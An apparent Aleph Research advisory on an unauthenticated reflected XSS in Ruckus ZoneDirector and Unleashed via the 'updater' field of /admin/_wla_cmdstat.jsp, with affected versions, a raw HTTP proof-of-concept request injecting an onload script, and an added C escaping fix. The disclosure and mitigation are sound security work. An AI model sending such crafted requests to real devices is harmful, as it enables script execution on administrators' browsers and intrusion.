
XSS in /admin/_wla_cmdstat.jsp

Aleph Research Advisory

Identifier

Severity

Moderate

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

An XSS issue in the emfd executable in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to execute JavaScript code via an unauthenticated crafted HTTP request. Every ajax request to “/admin/_wla_cmdstat.jsp” must contain an “updater” attribute, and the server reflects this value in the ajax response as an “id” attribute.

Information about the exploitation of this vulnerability can also be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_wla_cmdstat.jsp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

<ajax-request action='docmd' updater='">
<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>
<!--' comp='system'>
<xcmd cmd='get-security-email-hint'/>
</ajax-request>
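
The mitigation for this class of bug is to encode the “updater” value before writing it into the “id” attribute. The following is an added example, not code from the advisory or from the vendor's firmware: the function names and the `<response id="..."/>` element shape are assumptions, and the test input is the updater value from the proof of concept above.

```c
#include <stdio.h>
#include <string.h>
/* The updater value from the proof of concept above, as a C string. */
static const char POC_UPDATER[] =
    "\">\n<a xmlns:a=\"http://www.w3.org/1999/xhtml\">"
    "<a:body onload=\"alert(1)\"/></a>\n<!--";

/* Escape src for use inside a quoted XML attribute value.
 * Returns the escaped length, or -1 if dst (cap bytes) is too small. */
int xml_attr_escape(const char *src, char *dst, size_t cap)
{
    size_t n = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (n + len >= cap)          /* keep room for the NUL */
            return -1;
        memcpy(dst + n, rep ? rep : src, len);
        n += len;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Assumed response shape: <response id="..."/> (element name is hypothetical). */
int build_response(const char *updater, char *out, size_t cap)
{
    char id[1024];
    if (xml_attr_escape(updater, id, sizeof id) < 0)
        return -1;                   /* refuse oversized values, never truncate */
    int n = snprintf(out, cap, "<response id=\"%s\"/>", id);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

int main(void)
{
    char out[2048];
    if (build_response(POC_UPDATER, out, sizeof out) > 0)
        puts(out);
    return 0;
}
```

With the value encoded, the quote and angle brackets in the crafted updater stay inside the attribute and no new element reaches the XML parser.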

Timeline

Posts

Credit

External References